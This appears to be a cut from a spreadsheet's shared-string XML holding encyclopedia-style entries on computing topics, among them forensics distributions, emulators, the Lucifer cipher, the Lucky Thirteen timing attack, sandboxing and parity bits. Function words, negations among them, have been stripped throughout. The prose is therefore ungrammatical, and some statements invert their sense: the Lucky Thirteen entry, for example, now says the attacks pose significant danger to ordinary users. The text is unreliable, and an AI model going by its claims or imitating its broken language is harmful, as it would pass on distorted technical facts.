    <t>during 1980s, digital forensic investigations consisted "live analysis", examining digital media directly using non-specialist tools. 1990s, several freeware proprietary tools (both hardware software) created allow investigations take place without modifying media. this first tools mainly focused computer forensics, although recent years similar tools evolved field mobile device forensics. this list includes notable examples digital forensic tools. forensics-focused operating systems debian-based kali linux debian-derived linux distribution designed digital forensics penetration testing, formerly known backtrack.parrot security cloud-oriented linux distribution based debian designed perform security penetration tests, forensic analysis, anonymity. uses mate desktop environment, linux kernel higher available live lightweight installable image 32-bit, 64-bit processors forensic options boot, optimizations programmers, custom pentesting tools. ubuntu-based caine linux ubuntu-based live cd/dvd. caine stands computer aided investigative environment. pentoo-based pentoo penetration testing overlay livecd live live designed penetration testing security assessment. based gentoo linux, pentoo provided 32-bit 64-bit installable live pentoo also available overlay existing gentoo installation. features packet injection patched wifi drivers, gpgpu cracking software, many tools penetration testing security assessment. pentoo kernel includes grsecurity hardening extra patches binaries compiled hardened toolchain latest nightly versions tools available. computer forensics memory forensics memory forensics tools used acquire analyze computer's volatile memory (ram). they often used incident response situations preserve evidence memory would lost system shut down, quickly detect stealthy malware directly examining operating system running software memory. mobile device forensics mobile forensics tools tend consist hardware software component. mobile phones come diverse range connectors, hardware devices support number different cables perform role write blocker computer devices. software forensics software forensics science analyzing software source code binary code determine whether intellectual property infringement theft occurred. centerpiece lawsuits, trials, settlements companies dispute issues involving software patents, copyrights, trade secrets. software forensics tools compare code determine correlation, measure used guide software forensics expert. other references also list data recovery software</t>
  </si>
  <si>
    <t>List of emulators</t>
  </si>
  <si>
    <t>this article lists software emulators. central processing units armulator aemulor qemu mips spim: ovpsim mips mips32 emulator, used develop software using virtual platforms, emulators including mips processors running mips mips32 processors running many oses including linux. used build emulators single mips processors multiple homogeneous heterogenous architecture bochs dosbox fx!32 pcem qemu opensource emulator emulates architectures including arm, x86, mips, others box86 rosetta apple's emulator macos allowing x86_64 applications arm64 platform motorola 680x0 emulator: powerpc classic powerpc pearpc rosetta: apple's emulator powerpc processors, built warpup: amiga system powerpc expansion cards built morphos available amigaos sheepshaver: emulates powerpc processor. computer system emulators full system simulators simics sim: java application allows user design create simple architecture instruction programs instructions simulation gxemul: framework full-system computer architecture emulation mobile phones pdas palm emulator adobe device central bluestacks blisk (browser) multi-system emulators bluemsx: emulates based computers consoles mame: emulates multiple arcade machines, video game consoles computers daphne arcade emulator application emulates variety laserdisc video games intent preserving games making play experience faithful originals possible. developer calls daphne "first ever multiple arcade laserdisc emulator" ("female"). derives name princess daphne, heroine dragon's lair. hypseus modern sdl2 update daphne emulator, named sibling daphne. network emulators ns-2 cisco packet tracer router operating system emulators unix cygwin: microsoft windows, provides posix environment system libraries (contained cygwin.dll). this allow unaltered linux/unix binaries. however, allows compiler collection compile software written operating systems source code.in addition posix system, cygwin includes package manager connects repository 9000+ software packages. users optionally cygwin ports repository includes &gt;2300 (86x64) &gt;2700 (86x32) additional software packages included redhat-hosted repository, including many applications.the repository contains wide range software, including bash (command shell scripting environment comparable windows powershell), compiler collection complete tool chain. addition, 'usual customary' programming languages installed linux distribution, including c++, python, php, perl, tcl/tk, available, along multiple development libraries.in addition bash, utilities (e.g. find utilities, locate, find, grep) installed default. hundreds software packages included, many non-posix windows implementation, database management systems (postgresql, mysql), servers (e.g. apache http server), firewalls, text processing utilities, console mode applications. addition, (reasonably stable) x.org/x11 implementation libraries. based these, graphic desktop managers, including gnome, lxde, lxqt, kde, others (e.g. x2go) associated graphic user applications variable stability functionality. windows wine: available posix compliant (unix-like) operating systems, linux, bsd, macos (darling darwine projects). provides win32 cleanroom implementation associated functionality. contrast cygwin, wine enables installation unaltered windows software. considerable effort support video games, including third-party extensions (e.g. playonlinux) provide custom windows configurations known work large list videogames. addition, desktop productivity software, including office, supported. because lack dependence windows registry, inclusion statically linked libraries, least part) historic development open source projects, portable application, portableapps platform 300+ available software applications downloaded work little issues. printer emulators ghostscript: emulator printers without postscript terminal emulators video game console emulators also comparison application virtual machines comparison emulation virtualization apps android comparison platform virtualization software list free open-source emulators android list video game console emulators references</t>
  </si>
  <si>
    <t>List of file copying software</t>
  </si>
  <si>
    <t>this article provides list inbuilt third party file copying moving software utilities software used, part computer file management, explicitly move copy files data demand location another storage device. file copying fundamental operation data storage. most popular operating systems windows, macos linux well smartphone operating systems android contain built-in file copying functions well command line (cli) graphical (gui) interfaces filing system copy move functions. cases replaced supplemented third-party software different, extended, improved functionality. this article lists inbuilt well external software designed purpose. related software software designed copy, clone, image author entire storage devices cds, dvds, blu-ray disks, hard drives storage device partitions, back data, copiers work storage devices logical unit, general file managers utilities related file copying software, please see: functionality demands file copy software examples comparable operating functionality seen across file copying programs: criteria original files target location: typically location criteria selection within location) destination location existing target files: action take relation existing files target location file already exists, exist, files exist)a subtlety handling existing files whether files overwritten attempting copy, renamed target temporarily named) removed replacement file verified.verification: actions taken ensure integrity resulting compared original files queuing: multiple operations, operations large files large numbers files) scheduled prioritized, queue management operator confirmations warnings: whether request confirmation action file properties: whether copy file attributes, timestamps, permissions filing system idiosyncrasies: example, windows filing systems also track "8.3" short filenames unable correctly handle long file names program flow algorithms: multi-threading, buffering, data speed/priority, interruption/restart handling, atomicity/integrity assurance, algorithms affect efficiency operation.a notable function relates options determining whether underlying file system requested perform move operation, copy operation, create delete junction point (hard link), meet needs requested action. moving, linking delinking much faster lower risk copying, always desirable available. particular available source destination different logical devices devices easily allow moving existing data. cases "copy delete" operation unavoidable performing file move.variants pure copy move: whether create folders (directories) source, create files "null" (empty), rather copy data status, error, status reporting: error handling, logs reports produced operation(s), running upon completion compatible devices filing systems: usable/unusable types storage device filing systems system administration networking capabilities: example, copying across networks network management aspects, remote use, authentication.generic differentiators functions software: flexibility configurability: options, skins, extensibility/plugins operating system choice: cross platform? operating system integration: whether software inbuilt, separate, separate replace inbuilt functions interfaces: command line, gui, api, script review gizmo's freeware published basic comparison review range well-known third party file copying software windows. fastcopy given place, highest speed also light system resources (the author states uses cache avoid slowing software, win32 runtime rather mfc). ultracopier recognised well-developed interface. unstoppable copier well regarded niche copier designed best results damaged media files, cost speed. teracopy also mentioned also worth considering. more recently, raymond cc's blog reviewed similar range software windows versions also ranked fastcopy overall speed winner. both reviews four years old. list operating system commands: peripheral interchange program copy (command) xcopy windows copy utility included windows vista deprecated favour robocopy robocopy windows xcopy replacement options, introduced standard feature windows vista windows server 2008notable third-party file transfer software include: fastcopy richcopy rclone open source, used cloud storage rsync open source copy utility windows unix-like operating systems teracopy ultracopier, supercopier evolution also list backup software list unix commands file managers list data erasing software versioning file system references</t>
  </si>
  <si>
    <t>Scream Tracker</t>
  </si>
  <si>
    <t>scream tracker tracker integrated multi-track step sequencer sampler software application). created (sami tammilehto), founders finnish demogroup future crew. written assembly language. first version (1.0) monophonic 4-bit output speaker, well 8-bit output digital-to-analog converter parallel port sound blaster card. first popular version scream tracker, version 2.2, published 1990. versions prior created (scream tracker module) files, versions used (screamtracker module) format. last version scream tracker 3.21, released 1994. precursor tracking scene interface inspired newer trackers like impulse tracker.as version 3.0, scream tracker supports 8-bit samples, channels, patterns, order positions. also handle fm-synthesis channels sound cards using popular opl2/3/4 chipsets, and, unusually, play samples instruments time. there channels referred r1..8, l1..8 a1..9 assigned ones, gives effective amount channels. 16-position free panning available using command, gravis ultrasound. usage channels requires presence adlib-compatible card either alongside another sound card. future crew released third version (st3) 1994, placing competition fasttracker various trackers (such impulse tracker openmpt) adopted scream tracker's format. also milkytracker references</t>
  </si>
  <si>
    <t>QuakeML</t>
  </si>
  <si>
    <t>quake markup language (quakeml) flexible, extensible modular representation seismological data (e.g. epicenter, hypocenter, magnitude) intended cover broad range fields application modern seismology. flexible approach quakeml allows extensions standard order represent waveform data, macroseismic information, probability density functions, slip distributions, shake maps, others. quakeml open standard developed distributed team transparent collaborative manner. development quakeml developed parallel representation data model. this allows elaborate software development strategy uses class model together custom profile. schema (xsd) description created automatically model help tagged values, describe mapping class attributes representation. uml/xmi description also used basis automated creation class library using code generators. suitable programming languages are, e.g., python, c++, java. approach, writing reading quakeml documents equivalent serializing/deserializing quakeml objects to/from representation. possibility would serialization/deserialization to/from persistent storage relational database. quakeml language definition supplemented concept provide resource metadata facilitate metadata exchange distributed data providers. purpose, quakeml proposes uri-based format unique, location-independent identifiers seismological resources assigned approved naming authorities. later development stage, quakeml provide vocabulary resource metadata description, covering resource's identity, curation, content, temporal availability, data quality, associated services. quakeml proposes network registry institutions offer services resolving resource identifiers corresponding rdf/xml metadata descriptions, additionally provide means resource discovery offering services searches resource metadata. version version latest stable version quakeml. schemas documentation version found here. this version used results event queries international federation digital seismograph networks (fdsn) services supported data centers around world, european seismic portal. version quakeml next major version. quakeml version covered (only) basic seismic event description, whereas v2.0 many thematic packages available, currently development. currently, following packages development first-level elements (child elements quakeml): basic event description (bed) basic event description real time (bed-rt) borehole hydraulic macroseismic seismic source site characterization station characterization strong motionhelper packages define first-level elements: basic event description types common filter resource metadata waveform quakepy tools quakepy python package designed tools statistical analyses seismological data encoded using quakeml. provides library classes earthquake catalog handling computations, plot routines visualizing obtained results. quakepy developed python fully open-source library, based multiple tools gmt. although quakepy avoids proprietary software, many tools python allow matlab-like working environment, e.g., ipython. references external links quakeml homepage</t>
  </si>
  <si>
    <t>Scramdisk</t>
  </si>
  <si>
    <t>scramdisk free on-the-fly encryption program windows windows windows non-free version also available windows original scramdisk longer maintained; author, shaun hollingworth, joined paul roux (the author e4m) produce scramdisk's commercial successor, drivecrypt. author scramdisk provided driver windows author provided driver windows enabling cross-platform versions programs. there project called scramdisk linux provides access scramdisk truecrypt containers. older versions truecrypt included support scramdisk. licensing although scramdisk's source code still available, stated released licensed private study development. however, contains implementation misty1 encryption algorithm hironobu suzuki, a.k.a. h2np) licensed version violation gpl. also disk encryption disk encryption software comparison disk encryption software references external links scramdisk samsimpson.com original scramdisk site internet archive official site- though scramdisk longer available scramdisk linux</t>
  </si>
  <si>
    <t>List of cryptographic file systems</t>
  </si>
  <si>
    <t>this list filesystems support filesystem-level encryption. confused full-disk encryption. general-purpose filesystems encryption advfs digital tru64 unix novell storage services novell netware linux ntfs encrypting file system (efs) microsoft windows since pool version ext4, added linux kernel june 2015 f2fs, added linux apfs, macos high sierra (10.13) later. cryptographic filesystems fuse-based file systems integrated linux kernel ecryptfs rubberhose filesystem (discontinued) stegfs (discontinued) integrated unixes pefs (private encrypted file system) freebsd geli freebsd (encrypted file system) also comparison disk encryption software references</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>computer management intelligence, analysis system network analysis) science seeking make sense computer-generated records (also called audit trail records). process creating records called data logging. typical reasons people perform analysis are: compliance security policies compliance audit regulation system troubleshooting forensics (during investigations response subpoena) security incident response understanding online user behaviorlogs emitted network devices, operating systems, applications manner intelligent programmable devices. stream messages time sequence often comprises log. logs directed files stored disk directed network stream collector. messages must usually interpreted concerning internal state source (e.g., application) announce security-relevant operations-relevant events (e.g., user login, systems error). logs often created software developers debugging operation application understanding users interacting system, search engine. syntax semantics data within messages usually application vendor-specific. terminology also vary; example, authentication user application described logon, user connection authentication event. hence, analysis must interpret messages within context application, vendor, system configuration make useful comparisons messages different sources. message format content always fully documented. task analyst induce system emit full range messages understand complete domain messages must interpreted. analyst varying terminology different sources uniform, normalized terminology reports statistics derived heterogeneous environment. example, messages windows, unix, network firewalls, databases aggregated "normalized" report auditor. different systems signal different message priorities different vocabulary, "error" "warning" "err", "warn", "critical". hence, analysis practices exist continuum text retrieval reverse engineering software. functions technologies pattern recognition function selecting incoming messages compare pattern book filter handle different ways. normalization function converting message parts format (e.g. common date format normalized address). classification tagging ordering messages different classes tagging different keywords later usage (e.g. filtering display). correlation analysis technology collecting messages different systems finding messages belonging single event (e.g., messages generated malicious activity different systems: network devices, firewalls, servers, etc.). usually connected alerting systems. artificial ignorance type machine learning process discarding entries known uninteresting. artificial ignorance method detect anomalies working system. analysis, means recognizing ignoring regular, common messages result normal operation system, therefore interesting. however, messages appeared logs signal important events, therefore investigated. addition anomalies, algorithm identify common events occur. example, system update runs every week, failed run. analysis often compared analytics tools application performance management (apm) error monitoring. while much functionality clear overlap, difference rooted process. emphasis performance utilized production. error monitoring driven developers versus operations, integrates code exception handling blocks. also audit trail data logger monitor server system monitor analysis software list analytics software references</t>
  </si>
  <si>
    <t>Log shipping</t>
  </si>
  <si>
    <t>shipping process automating backup transaction files primary (production) database server, restoring onto standby server. this technique supported microsoft server, server, mysql, postgresql. similar replication, primary purpose shipping increase database availability maintaining backup server replace production server quickly. other databases adaptive server enterprise oracle database support technique require database administrator write code scripts perform work. although actual failover mechanism shipping manual, implementation often chosen cost human server resources, ease implementation. comparison, server clusters enable automatic failover, expense much higher storage costs. compared database replication, shipping provide much terms reporting capabilities, backs system tables along data tables, locks standby server users' modifications. replicated server modified (e.g. views) therefore unsuitable failover purposes. references external links shipping, server implementation standby, postgresql implementation</t>
  </si>
  <si>
    <t>Log-structured file system</t>
  </si>
  <si>
    <t>log-structured filesystem file system data metadata written sequentially circular buffer, called log. design first proposed 1988 john ousterhout fred douglis first implemented 1992 ousterhout mendel rosenblum unix-like sprite distributed operating system. rationale conventional file systems tend files great care spatial locality make in-place changes data structures order perform well optical magnetic disks, tend seek relatively slowly. design log-structured file systems based hypothesis longer effective ever-increasing memory sizes modern computers would lead becoming write-heavy reads would almost always satisfied memory cache. log-structured file system thus treats storage circular writes sequentially head log. this several important side effects: write throughput optical magnetic disks improved batched large sequential runs costly seeks kept minimum. structure naturally suited media append-only zones pages flash storages shingled magnetic recording hdds writes create multiple, chronologically-advancing versions file data meta-data. some implementations make file versions nameable accessible, feature sometimes called time-travel snapshotting. this similar versioning file system. recovery crashes simpler. upon next mount, file system need walk data structures inconsistencies, reconstruct state last consistent point log.log-structured file systems, however, must reclaim free space tail prevent file system becoming full head wraps around meet tail release space move forward skipping data newer versions exist farther ahead log. newer versions, data moved appended head. reduce overhead incurred garbage collection, implementations avoid purely circular logs divide storage segments. head simply advances non-adjacent segments already free. space needed, least-full segments reclaimed first. this decreases load (and decreases write amplification) garbage collector, becomes increasingly ineffective file system fills nears capacity. disadvantages design rationale log-structured file systems assumes reads optimized away ever-enlarging memory caches. this assumption always hold: magnetic media—where seeks relatively expensive—the structure actually make reads much slower, since fragments files conventional file systems normally keep contiguous in-place writes. flash memory—where seek times usually negligible—the structure confer worthwhile performance gain write fragmentation much less impact write throughput. another issue stacking another log, good idea forces multiple erases unaligned access. however many flash based devices cannot rewrite part block, must first perform (slow) erase cycle block able re-write, putting writes block, help performance opposed writes scattered various blocks, must copied buffer, erased, written back, clear advantage so-called "raw" flash memory flash translation layer bypassed. also list log-structured file systems comparison file systems references further reading log-structured file systems (2014), arpaci-dusseau, remzi arpaci-dusseau, andrea arpaci-dusseau books</t>
  </si>
  <si>
    <t>Parrot OS</t>
  </si>
  <si>
    <t>parrot linux distribution based debian focus security, privacy, development. core parrot based debian's "testing" branch, linux 5.10 kernel. follows rolling release development model.the desktop environments mate, default display manager lightdm.the system certified devices minimum 256mb ram, suitable 32-bit (i386) 64-bit (amd64) processor architectures. moreover, project available armv7 (armhf) architectures. june 2017, parrot team announced considering change debian devuan, mainly problems systemd.as january 21st, 2019, parrot team begun phase development 32-bit (i386) iso.in august 2020, parrot officially supports lightweight xfce desktop. editions parrot multiple editions based upon debian, various desktop environments available. parrot security parrot intended provide suite penetration testing tools used attack mitigation, security research, forensics, vulnerability assessment.it designed penetration testing, vulnerability assessment mitigation, computer forensics anonymous browsing. parrot home parrot home base edition parrot designed daily use, targets regular users need "lightweight" system laptops workstations. distribution useful daily work. parrot home also includes programs chat privately people, encrypt documents, browse internet anonymously. system also used starting point build system custom security tools. parrot parrot lightweight parrot release embedded systems. currently available raspberry devices. parrot architect parrotos nothing pre-installed. install software edition. parrot tools there multiple tools parrot specially designed security researchers related penetration testing. listed below, found official website. tor, also known onion router, distributed network anonymizes internet browsing. designed address client using hidden server client visiting. also, data details hidden client’s internet service provider (isp). network uses hops encrypt data client server. network browser pre-installed configured parrot onion share onion share open-source utility used share files size network securely anonymously. onion share generates long random used recipient download file network using browser. anonsurf anonsurf utility makes operating system communication anonymizing networks. according parrot, anonsurf secures browser anonymizes also backbox blackarch devuan kali linux list digital forensics tools security-focused operating system notes external links official website blog release notes distrowatch debian derivatives census</t>
  </si>
  <si>
    <t>Lucifer (cipher)</t>
  </si>
  <si>
    <t>cryptography, lucifer name given several earliest civilian block ciphers, developed horst feistel colleagues ibm. lucifer direct precursor data encryption standard. version, alternatively named dtd-1, commercial 1970s electronic banking. overview lucifer uses combination transposition substitution crypting starting point decoding ciphers. variant, described feistel 1971, uses 48-bit operates 48-bit blocks. cipher substitution–permutation network uses 4-bit s-boxes. selects s-boxes used. patent describes execution cipher operating bits time, also sequential version operating bits time. another variant john smith year uses 64-bit operating 32-bit block, using addition singular 4-bit s-box. construction designed operate bits clock cycle. this smallest block-cipher implementations known. feistel later described stronger variant uses 128-bit operates 128-bit blocks.sorkin (1984) described later lucifer 16-round feistel network, also 128-bit blocks 128-bit keys. this version susceptible differential cryptanalysis; half keys, cipher broken chosen plaintexts time complexity.ibm submitted feistel-network version lucifer candidate data encryption standard (compare recent process). became national security agency reduced cipher's size bits, reduced block size bits, made cipher resistant differential cryptanalysis, time known nsa. name "lucifer" apparently "demon". this turn truncation "demonstration", name privacy system feistel working operating system used could handle longer name. description sorkin variant variant described sorkin (1984) feistel rounds, like des, initial final permutations. block sizes bits. feistel function operates 64-bit half-block data, together 64-bit subkey "interchange control bits" (icbs). icbs control swapping operation. 64-bit data block considered series eight 8-bit bytes, corresponding particular byte zero, left right 4-bit halves (nibbles) swapped. one, byte left unchanged. each byte operated 4×4-bit s-boxes, denoted operates left 4-bit nibble operates right. resultant outputs concatenated combined subkey using exclusive (xor); termed "key interruption". this followed permutation operation stages; first permutes byte fixed permutation. second stage mixes bits bytes. key-scheduling algorithm relatively simple. initially, bits loaded shift register. each round, left bits register form subkey, right eight bits form bits. after round, register rotated bits left. references further reading biham, shamir (1991). differential cryptanalysis snefru, khafre, redoc-ii, loki lucifer. crypto 1991: pp156–171 whitfield diffie, susan landau (1998). privacy line: politics wiretapping encryption. steven levy. (2001). crypto: secrecy privacy code (penguin press science). external links john savard's description lucifer</t>
  </si>
  <si>
    <t>Lucky Thirteen attack</t>
  </si>
  <si>
    <t>lucky thirteen attack cryptographic timing attack implementations transport layer security (tls) protocol mode operation, first reported february 2013 developers nadhem alfardan kenny paterson information security group royal holloway, university london. attack novel variant serge vaudenay's padding oracle attack previously thought fixed, uses timing side-channel attack message authentication code (mac) check stage algorithm break algorithm fixed previous attempts mitigate vaudenay's attack. sense, attacks pose significant danger ordinary users current form. however, truism attacks better time, cannot anticipate improvements attacks, entirely attacks, discovered." nadhem alfardan kenny paterson researchers examined free software implementations found examined products potentially vulnerable attack. they tested attacks successfully openssl gnutls. because researchers applied responsible disclosure worked software vendors, software updates mitigate attacks available time publication.martin albrecht paterson since demonstrated variant lucky thirteen attack amazon's implementation, even though includes countermeasures intended prevent timing attacks. references external links time money ciphersuites), nikos mavrogiannopoulos, february 2013</t>
  </si>
  <si>
    <t>LuckyBackup</t>
  </si>
  <si>
    <t>luckybackup free backup application linux. provides based cross-platform framework fundamentally console based based many clients list backup software are. translated many languages available repositories major linux distributions including debian, ubuntu, opensuse, fedora, mandriva, slackware gentoo. awards distinctions august 2009: place sourceforge community choice awards "best project" 2008–2010: highest rated application kde-apps.org references external links luckybackup sourceforge</t>
  </si>
  <si>
    <t>Sandstorm Enterprises</t>
  </si>
  <si>
    <t>sandstorm enterprises american computer security software vendor founded 1998 simson garfinkel, james bokkelen, gene spafford, geer. january 2010, purchased niksun, inc.sandstorm located greater boston area. sandstorm's major products phonesweep, first commercial multi-line telephone scanner dialer), introduced 1998, netintercept, commercial network forensics tool, introduced 2001. designed second-generation network analysis tool, netintercept operated primarily level data streams application-layer objects transport.in 2002 sandstorm purchased lanwatch, commercial packet-oriented monitor originally developed software. lanwatch sold separate product, much functionality used netintercept display individual packets. 2019, phonesweep product still sold supported niksun. core parts netintercept product also still exist, incorporated niksun's netdetector network forensics product line. references external links phonesweep niksun, inc.</t>
  </si>
  <si>
    <t>Sandboxie Plus</t>
  </si>
  <si>
    <t>sandboxie plus (formerly sandboxie) open-source os-level virtualization solution microsoft windows. started sandboxing solution creates isolated operating environment applications without permanently modifying local system. this virtual environment allows controlled testing untrusted programs surfing. sandboxie plus enhances original sandboxie adding multiple sandboxes, per-sandbox snapshots, full os-level virtualization. after various ownership transitions (sophos acquired invincea acquired sandboxie original author, ronen tzur), sophos eventually dropped support released open-source. david xanatos took project expanded sandboxie plus. history sandboxie initially released 2004 tool sandboxing internet explorer. over time, program expanded support browsers eventually, arbitrary apps.in december 2013, invincea announced acquisition sandboxie. original developer ronen tzur announced would longer involved program.in february 2017, sophos announced acquisition invincea. invincea posted assurance sandboxie's website time sandboxie's development support would continue normal.version 4.02 introduced full support windows. exception windows professional edition, never supported.windows supported version 5.22, support dropped. september 2019, sandboxie version 5.31.4 released freeware license "with plans transition open source tool". previous commercial license still applied customers active licenses license expired. downtime april 2019, official site shut down, preventing downloads, installations purchases, prompted creation temporary forum company's domain.in 2019, official site returned original forums permanently shut favor sophos' forums, later shut well. between september 2019 (when sandboxie became freeware), purchase options still missing.in response announcement closure sandboxie website, software developer david berdik scraped site's contents published archive github 2020. open-source april 2020, sophos released source code source code-only version 5.40) license. sophos stated would longer involved development sandboxie open-source community would continue development instead. sandboxie plus sandboxie plus augmented version sandboxie. development since early 2020. first stable version sandboxie plus made available december 2021. sandboxie plus full os-level virtualization solution offers multiple sandboxes, ability confine apps sandbox, per-sandbox snapshots, granular file system control, privileges control, network access control.until version 0.4.5, antivirus software, including microsoft defender antivirus, falsely flagged sandboxie plus. clear false flag, sandboxie plus developer microsoft digital certificate, raised thanks donors patreon. version 0.5.0 first digitally signed version sandboxie plus. reception sandboxie included brothersoft's 2010 editors pick list. november 2011, gizmo's freeware gave sandboxie rating stars included editors' choice list "best free browser protection utility". softonic given sandboxie rating elena santos stating review "sandboxie handy tool test untrustworthy software without putting system danger." also shade sandbox deep freeze google native client, running native code sandbox browser icore virtual accounts windows steadystate references external links official website sandboxie: blocking web-based malware from your wayback machine (archived 2011-08-14) sandboxie internals wayback machine (archived 2013-04-29) sandboxie-plus: github files</t>
  </si>
  <si>
    <t>Sandbox (software development)</t>
  </si>
  <si>
    <t>sandbox testing environment isolates untested code changes outright experimentation production environment repository, context software development including development, automation revision control. sandboxing protects "live" servers data, vetted source code distributions, collections code, data and/or content, proprietary public, changes could damaging mission-critical system could simply difficult revert, regardless intent author changes. sandboxes replicate least minimal functionality needed accurately test programs code development (e.g. usage environment variables access identical database used stable prior implementation intended modified; many possibilities, specific functionality needs vary widely nature code application[s] intended). concept sandbox (sometimes also called working directory, test server development server) typically built revision control software git, subversion (svn), developers "check out" copy source code tree, branch thereof, examine work only developer (hopefully) fully tested code changes sandbox, changes would checked back merged repository thereby made available developers users software.by analogy, term "sandbox" also applied computing networking temporary indefinite isolation areas, security sandboxes search engine sandboxes (both highly specific meanings), prevent incoming data affecting "live" system aspects thereof) unless/until defined requirements criteria met. services term sandbox commonly used development services refer mirrored production environment external developers. typically, third-party developer develop create application service sandbox, used allow third-party team validate code migrating production environment. microsoft,google, amazon.com,salesforce.com,paypal,ebay yahoo, among others, provide services. wikis wikis also typically employ shared sandbox model testing, though intended principally learning outright experimentation features rather testing alterations existing content (the wiki analog source code). edit preview mode usually used instead test specific changes made texts layout wiki pages. also comparison online source code playgrounds os-level virtualization pastebin sandbox (computer security) sandbox effect (search engines) sandbox (video game editor) sandbox game references</t>
  </si>
  <si>
    <t>Lsh</t>
  </si>
  <si>
    <t>free software implementation secure shell (ssh) protocol version project including server client programs. featuring secure remote password protocol (srp) specified secsh-srp besides, public-key authentication. kerberos somewhat supported well. currently however password verification only, single sign-on (sso) method.lsh started scratch predates openssh.karim yaghmour concluded 2003 "not use" production embedded linux systems, dependencies upon software packages multiplicity dependencies. package requires library, zlib, liboop, latter turn requires glib, requires pkg-config. yaghmour notes suffers cross-compilation problems inherits glib. target architecture host," states, "lsh practical choice time."debian provides packages lsh-server, lsh-utils, lsh-doc lsh-client. also comparison servers comparison clients wrappers gnutls references external links homepage</t>
  </si>
  <si>
    <t>Sandbox (computer security)</t>
  </si>
  <si>
    <t>computer security, sandbox security mechanism separating running programs, usually effort mitigate system failures and/or software vulnerabilities spreading. often used execute untested untrusted programs code, possibly unverified untrusted third parties, suppliers, users websites, without risking harm host machine operating system. sandbox typically provides tightly controlled resources guest programs storage memory scratch space. network access, ability inspect host system, read input devices usually disallowed heavily restricted. sense providing highly controlled environment, sandboxes seen specific example virtualization. sandboxing frequently used test unverified programs contain virus malicious code without allowing software harm host device. implementations sandbox implemented executing software restricted operating system environment, thus controlling resources (e.g. file descriptors, memory, file system space, etc.) process use.examples sandbox implementations include following: linux application sandboxing, built seccomp, cgroups linux namespaces. notably used systemd, google chrome, firefox, firejail. android first mainstream operating system implement full application sandboxing, built assigning application linux user apple sandbox required apps distributed apple's store ios/ipados store, recommended signed apps. windows vista later editions include "low" mode process running, known "user account control" (uac), allows writing specific directory registry keys. windows pro, version 1903, provides feature known windows sandbox. google sandboxed api. virtual machines emulate complete host computer, conventional operating system boot actual hardware. guest operating system runs sandboxed sense function natively host access host resources emulator. jail: network-access restrictions, restricted file system namespace. jails commonly used virtual hosting. rule-based execution gives users full control processes started, spawned applications), allowed inject code applications access net, system assign access levels users programs according determined rules. also control file/registry security (what programs read write file system/registry). environment, viruses trojans fewer opportunities infecting computer. selinux apparmor security frameworks implementations linux. security researchers rely heavily sandboxing technologies analyse malware behavior. creating environment mimics replicates targeted desktops, researchers evaluate malware infects compromises target host. numerous malware analysis services based sandboxing technology. google native client sandbox running compiled code browser efficiently securely, independent user's operating system. capability systems thought fine-grained sandboxing mechanism, programs given opaque tokens spawned ability specific things based tokens hold. capability-based implementations work various levels, kernel user-space. example capability-based user-level sandboxing involves html rendering browser. secure computing mode (seccomp) sandbox built linux kernel. when activated strict mode, seccomp allows write(), read(), exit(), sigreturn() system calls. html5 "sandbox" attribute iframes. java virtual machines include sandbox restrict actions untrusted code, java applet. .net common language runtime provides code access security enforce restrictions untrusted code. software fault isolation (sfi), allows running untrusted native code sandboxing store, read jump assembly instructions isolated segments memory.some cases sandboxes include following: online judge systems test programs programming contests. new-generation pastebins allowing users execute pasted code snippets pastebin's server. also sandboxie seccomp shade sandbox test bench (anonymity network) references external links security in-depth linux software: preventing mitigating security bugs sandbox chromium projects freebsd capsicum(4) page lightweight capability sandbox framework openbsd pledge(2) page restrict system operations sandbox testing importance{sandbox} importance sandbox zero flaw</t>
  </si>
  <si>
    <t>Parity bit</t>
  </si>
  <si>
    <t>parity bit, check bit, added string binary code. parity bits simple form error detecting code. parity bits generally applied smallest units communication protocol, typically 8-bit octets (bytes), although also applied separately entire message string bits. parity ensures total number 1-bits string even odd. accordingly, variants parity bits: even parity parity bit. case even parity, given bits, occurrences bits whose value counted. count odd, parity value making total count occurrences whole (including parity bit) even number. count given bits already even, parity bit's value case parity, coding reversed. given bits, count bits value even, parity value making total count whole (including parity bit) number. count bits value odd, count already parity bit's value even parity special case cyclic redundancy check (crc), 1-bit generated polynomial x+1. parity mathematics parity refer evenness oddness integer, which, written binary form, determined examining least significant bit. information technology parity refers evenness oddness, given binary digits, number bits value one. because parity determined state every bits, property parity—being dependent upon bits changing value even parity changes—allows error detection correction schemes. telecommunications parity referred protocols error-detection. transmission medium preset, points, agree either parity even parity. string bits ready transmit (data packet) sender calculates parity bit, zero one, make conform agreed parity, even odd. receiver packet first checks parity packet whole accordance preset agreement, then, parity error packet, requests re-transmission packet. computer science parity stripe parity disk raid array provides error-correction. parity bits written rate parity bits, number disks array. when read error occurs, error region recalculated bits. way, using parity creates "redundancy" region size size disk. redundant array independent disks below. electronics, transcoding data parity efficient, gates output equivalent check creates even parity, logic design easily scales number inputs. structures comprise bulk integrated circuitry. error detection number bits (including parity bit) transmitted incorrectly, parity incorrect, thus indicating parity error occurred transmission. parity suitable detecting errors; cannot correct errors, determine particular corrupted. data must discarded entirely, re-transmitted scratch. noisy transmission medium, successful transmission therefore take long time, even never occur. however, parity advantage uses single requires number gates generate. hamming code example error-correcting code. parity checking used occasionally transmitting ascii characters, bits, leaving parity bit. example, parity computed follows. assume alice communicating alice wants send simple 4-bit message 1001. this mechanism enables detection single errors, gets flipped line noise, incorrect number ones received data. examples above, bob's calculated parity value matches parity received value, indicating single errors. consider following example transmission error second using xor: there limitation parity schemes. parity guaranteed detect number errors. even number bits errors, parity records correct number ones, even though data corrupt. (see also error detection correction.) consider example even number corrupted bits: observes even parity, expected, thereby failing catch errors. usage because simplicity, parity used many hardware applications operation repeated case difficulty, simply detecting error helpful. example, scsi buses parity detect transmission errors, many microprocessor instruction caches include parity protection. because i-cache data copy main memory, disregarded re-fetched found corrupted. serial data transmission, common format data bits, even parity bit, stop bits. this format accommodates 7-bit ascii characters 8-bit byte. other formats possible; bits data plus parity convey 8-bit byte values. serial communication contexts, parity usually generated checked interface hardware (e.g., uart) and, reception, result made available processor (and too, instance, operating system) status hardware register interface hardware. recovery error usually done retransmitting data, details usually handled software (e.g., operating system routines). when total number transmitted bits, including parity bit, even, parity advantage all-zeros all-ones patterns detected errors. total number bits odd, patterns detected error, choice made based expected common error. raid array parity data used raid arrays (redundant array independent/inexpensive disks) achieve redundancy. drive array fails, remaining data drives combined parity data (using boolean function) reconstruct missing data. example, suppose drives three-drive raid array contained following data: calculate parity data drives, performed data: resulting parity data, 10111001, stored drive should three drives fail, contents failed drive reconstructed replacement drive subjecting data remaining drives operation. drive fail, data could rebuilt using results contents 